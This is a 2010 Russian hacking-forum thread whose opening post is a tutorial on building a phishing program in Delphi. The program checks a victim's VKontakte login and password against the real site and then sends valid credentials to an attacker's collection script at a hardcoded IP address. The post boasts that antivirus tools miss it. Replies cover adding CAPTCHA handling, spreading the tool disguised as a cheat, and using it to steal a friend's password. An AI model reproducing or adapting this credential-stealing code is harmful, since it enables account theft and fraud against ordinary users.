Пишем фейк на Дельфи (c проверкой на валидность)

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by MrAkimov, 11 Nov 2010.

Thread Status:
Not open for further replies.
  1. MrAkimov

    MrAkimov Banned

    Joined:
    1 May 2010
    Messages:
    0
    Likes Received:
    5
    Reputations:
    5
    Привет Ачат!
    В последнее время заглядывая в торговый раздел форума, частенько вижу что люди продают програмыне фейки, причем пои немалой цене - от 100 руб. Сегодня мы попробуем изготовить программный фейк своими руками "в домашних условиях".

    Что нам понадобится:
    Итак, начнем.
    Для начала разберем ,что будет делать наш фейк:
    1) юзер вводит логин и пароль
    2) логин и пароль проверяется на валидность.
    3) если логин и пароль валидны, то отправляем их нам, иначе сообщаем юзеру что он ввел неправильные данные.

    Тут все понятно, но вот куда-же программа будет отсылать валидные логин и пароль? Тут наиболее популярны 2 варианта: отправка на гейт, и отправка на email. Наиболее эфективная и проста отправка на гейт.

    Теперь подробно поговорим про сам гейт. Скачать файлы для гейта можно тут http://www.sendspace.com/file/w9y9x2

    инструкция по установке гейта: скачиваем и распаковываем архив. Заливаем файлы на хост и для файла base.php ставим права 777.


    Написание программы.
    ну что-же, заходим в дельфи и создаем новый проект.

    [​IMG]

    Теперь нам нужно оформить фейк. Оформляется он элементарно - с использованием TLabel, TEdit, TImage (ну можно конечно и ползунки, и чекбоксы для красоты)

    [​IMG]

    Теперь нужно написать обработчик для Кнопки "Вход". Название оно у меня носит - Button1

    вот он:
    Code:
    procedure TForm1.Button1Click(Sender: TObject);
    begin
         // Создание объектом для авторизации вконтакте - проверки логина и пароля  
         http:=TidHttp.Create(nil);
        cookie:=TidCookieManager.create;
        http.CookieManager:=cookie;
        http.ReadTimeout:=10000;
        param:=TstringList.Create;
    
          // Пошла авторизация
          param.add('email='+login.text);   //login - edit для ввода логина
          param.add('pass='+pass.text);   // pass - edit для ввода пароля
          param.add('vk=');
          param.add('expire=0');
           try
          res:=http.post('http://login.vk.com/?act=login',param);
           except end;
    
          s:=copy(res,pos('value', res)+7,56);
          param.Clear;
    
          param.add('s='+s);
          param.add('op=slogin');
          param.add('redirect=0');
          param.add('expire=0');
          param.add('to=');
          try
          res:=http.post('http://vkontakte.ru/login.php',param);
          except end;
          param.clear;
    
    // Если авторизация прошла удачно, то...
     if pos('id', http.Response.Location)>0 then
          begin
            // Отправляем данные на гейт
            param.add('login='+login.text);
            param.add('passwd='+pass.text);
            try http.post('http://173.224.114.85/log.php', param); // Вместо 173.224.114.85 вводим сайт на котором залит скрипт принятия акков
            except end;
          end
     else ShowMessage('Вы ввели неверные данные, повторите попытку!');
    
    end;
    вот и весь код. Изменяем название формы, иконку формы, и компилируем.



    Все) данный код не определяется антивирусами как вирус(проверено на virustotal - 1\40)


    Это первая статья, надеюсь новичкам будет интересно.
    Ваш, MrAkimov
     
    5 people like this.
  2. Dr!nk

    Dr!nk New Member

    Joined:
    27 Oct 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Зачем нужна библиотека indy ? Я не силен в delphi )
     
  3. Nikita_M

    Nikita_M New Member

    Joined:
    18 May 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Чтобы Delphi можно было использовать для написания интернет-приложений.
     
  4. dr.Web

    dr.Web Member

    Joined:
    2 Feb 2009
    Messages:
    18
    Likes Received:
    22
    Reputations:
    10

    ХУЙНЯ!!!
    а что будет если каптча?
     
    #4 dr.Web, 12 Nov 2010
    Last edited by a moderator: 12 Nov 2010
  5. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    577
    Likes Received:
    48
    Reputations:
    0
    мдааа. И таких "плодунов" с этими фэйками тут уже все стопицот, если не польше. Сколько можно? о_О лучше бы рассказал, как такой интерфейс намутил)) хорошо, что хоть с отправкой на гейт, а не не с эл.почту.
     
  6. dpe_x

    dpe_x Elder - Старейшина

    Joined:
    8 Sep 2010
    Messages:
    171
    Likes Received:
    35
    Reputations:
    14
    походу в невалид кинет).
    автор конечно молодец за старание.
    но эти фейки это полная ***ня..
     
  7. DiplomatQ

    DiplomatQ Elder - Старейшина

    Joined:
    4 Jun 2008
    Messages:
    50
    Likes Received:
    5
    Reputations:
    1
    обоснуй. Норм фейк.
     
  8. dpe_x

    dpe_x Elder - Старейшина

    Joined:
    8 Sep 2010
    Messages:
    171
    Likes Received:
    35
    Reputations:
    14
    я не имел ввиду именно этот( может он и хорош чем то хотя я хз чем),а фейки в целом.
     
  9. FoxMulder77

    FoxMulder77 Member

    Joined:
    9 Nov 2010
    Messages:
    113
    Likes Received:
    8
    Reputations:
    14
    может быть лучше добавить модуль с капчей? нежели обсирать труды человека.
    загуглил по этому вопросу, сейчас на вконте после 5 -ой попытки выскакиевает капча.. выскакиевает не просто так а без перезагзуки в гл. окне(соот-но ajax юзается), и капча там заливается с http://vkontakte.ru/captcha.php?s=1&sid=188810642504, если же как то парсить такую ссылку в прогу.... мы будем видеть что жэ за капча просится и вводить.
    зы если что то неправильно говорю, поправьте
     
    1 person likes this.
  10. 1n0y

    1n0y Active Member

    Joined:
    9 May 2009
    Messages:
    272
    Likes Received:
    269
    Reputations:
    2
    дада, это интересно

    2dr.Web, зачем же веть текст с картинками квотить?
     
  11. dr.Web

    dr.Web Member

    Joined:
    2 Feb 2009
    Messages:
    18
    Likes Received:
    22
    Reputations:
    10
    так получилось)


    При логине на контакт отправляется запрос, op=a_login_atempt в ответе будет либо айди каптчи либо vklogin либо ещё один из вариантов ответа.

    если ответ vklogin то форма отправляется если ответ айди каптчи то показывается каптча. Всё просто.
     
  12. MrAkimov

    MrAkimov Banned

    Joined:
    1 May 2010
    Messages:
    0
    Likes Received:
    5
    Reputations:
    5
    насчет капчи: на моем опыте я убедился, что по такой методике авторизации, капча выскакивает крайне редко. и то при невалидном логине\пароле. то есть если человек введет неверный логин - пароль и вылезет капча .фейк все равно покажет акк как невалид.

    модуль капчи я могу добавить, если кому-то интересно

    насчет бояна. Такие фейки - не способ зарабатывать акки сотнями или тысячами - они хороши для СИ или просто чтобы узнать пароль друга\подруги.
     
  13. SSSetuPPP

    SSSetuPPP Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    55
    Likes Received:
    4
    Reputations:
    0
    MrAkimov, добавь модуль с капчей, плиз... Давно собрался заняться изучением Delphi вплотную... Вот после прочтения этого топа решил... Буду грызть учебник...
     
  14. Kandi

    Kandi Member

    Joined:
    18 Nov 2009
    Messages:
    347
    Likes Received:
    17
    Reputations:
    0
    может быть расскажешь как грабить тысячами? Вообще с таким фейком касарика два за несколько месяцев реал собрать) главное красиво распространить еще и видио сделать где нить мол я читер нашел дырку вконтакте вот сделал прогу выкладываю на халяву)
     
  15. dr.Web

    dr.Web Member

    Joined:
    2 Feb 2009
    Messages:
    18
    Likes Received:
    22
    Reputations:
    10
    ты видимо мало работал в этой теме если незнаешь как грабить тысячами. ;)
     
  16. J4ever

    J4ever New Member

    Joined:
    30 Aug 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Дааа.. Автор, Расскажи об этом тоже ))
     
  17. RedFern.89

    RedFern.89 Member

    Joined:
    20 Jan 2010
    Messages:
    577
    Likes Received:
    48
    Reputations:
    0
    J4ever, я риальне не знаю, как он это сделал. скин или чо?
     
  18. AlexTheC0d3r

    AlexTheC0d3r Elder - Старейшина

    Joined:
    25 Jul 2008
    Messages:
    388
    Likes Received:
    179
    Reputations:
    18
    WinSock, WinInet?
    на крайняк FastInternet?
     
  19. FoxMulder77

    FoxMulder77 Member

    Joined:
    9 Nov 2010
    Messages:
    113
    Likes Received:
    8
    Reputations:
    14
    капча выскакивает при невалидной паре, но и выскакивает если он до этого все - таки успешно не авторизовался. думаю модуль капчи так и так нужен, ибо всякие люди бывают, а надеятся на их способности не стоит. иначе палево...
    с меня будет +
    Или выкладывай настройки, или скин, давай коись как делал? или просто скрин вбабахал откуда - то?
     
    #19 FoxMulder77, 13 Nov 2010
    Last edited: 13 Nov 2010
  20. ilyhamas

    ilyhamas Banned

    Joined:
    25 Oct 2009
    Messages:
    49
    Likes Received:
    2
    Reputations:
    0
    Видел когда-то давно этот скин на форуме alpha controls
     
Loading...
Thread Status:
Not open for further replies.